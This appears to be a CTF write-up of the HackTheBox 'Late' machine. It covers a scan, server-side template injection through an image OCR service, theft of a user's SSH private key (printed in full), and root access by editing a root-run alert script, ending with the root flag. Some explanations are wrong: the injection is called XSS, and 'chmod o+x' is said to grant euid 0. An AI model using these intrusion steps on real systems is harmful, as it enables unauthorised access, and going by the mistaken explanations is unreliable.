d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-late-htb/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

5.2 KiB
Raw Permalink Blame History

title date slug type
Writeup - Late (HTB) 2022-04-25 writeup-late-htb writeup-ctf

This is a writeup for the Late machine from the HackTheBox site.

Enumeration

First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn 10.129.45.153

Two TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 7.6p1)
  • 80/tcp : HTTP web server (nginx 1.14.0)

Exploit

First of all, let's start with the enumeration of the site's files.

After some research in the results nothing very interesting in this site. So I scan the subdomains.

I find the images subdomain. I add it in the /etc/hosts file, then I go to the site.

It is a site that allows to recover text present in an image and to send it back in a file. For that there is a treatment, in particular of the recognition of character. But is there any additional processing?

After some unsuccessful tests I try to perform an XSS (Cross Site Scripting). To try to determine if there is indeed a possibility to do it. I send the following image to the server:

Depending on the answer I will be able to determine if this attack is feasible and also potentially this Framework is used:

  • 777777 -> Jinja2
  • 49 -> Twig
┌──(d3vyce㉿kali)-[~/Downloads]
└─$ cat results.txt 
<p>7777777
</p>

After retrieving the result file we find the answer 7777777. The XSS is therefore possible and the framework has a great chance to be Jinja2! I go to the following github to see the possibilities.

I first try to send the following image:

┌──(d3vyce㉿kali)-[~/Downloads]
└─$ cat results.txt 
<p>uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)

</p>

In the result file I find the expected result, the web application is executed as svc_acc. I now try to see if this user has an RSA key that would allow me to connect via SSH:

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
-----END RSA PRIVATE KEY-----

Now that I have the RSA key in my possession, I can connect in SSH and get the first flag :

Privilege escalation

To start I run the linpeas.sh script to get an idea of what is present on the machine. Quickly I find a script ssh-alert.sh which is a script belonging to my user, but which is executed by root.

I look at its contents and find that it is a script that generates an alert by mail for each session opened via SSH.

Knowing that I can modify it, I add the following line at the end of the file.

echo "chmod o+x /bin/bash" >> ssh-alert.sh

This allows to add to the file a euid = 0, which will allow me to execute the script as root. This is the same principle that is used with the su command. I quit the ssh session, I restart it, then I create a bash session with the following command :

I am now root of the machine and I can recover the last flag.

bash-4.4# cat /root/root.txt 
0abb3c1b4d046ab54e80851cf85c6448

Recommendations

To patch this host I think it would be necessary to perform a number of actions:

  • Update the image converter to avoid XSS
  • Launch web applications with a user with minimum rights and no RSA key
  • Do not let a user-modifiable script be executed by root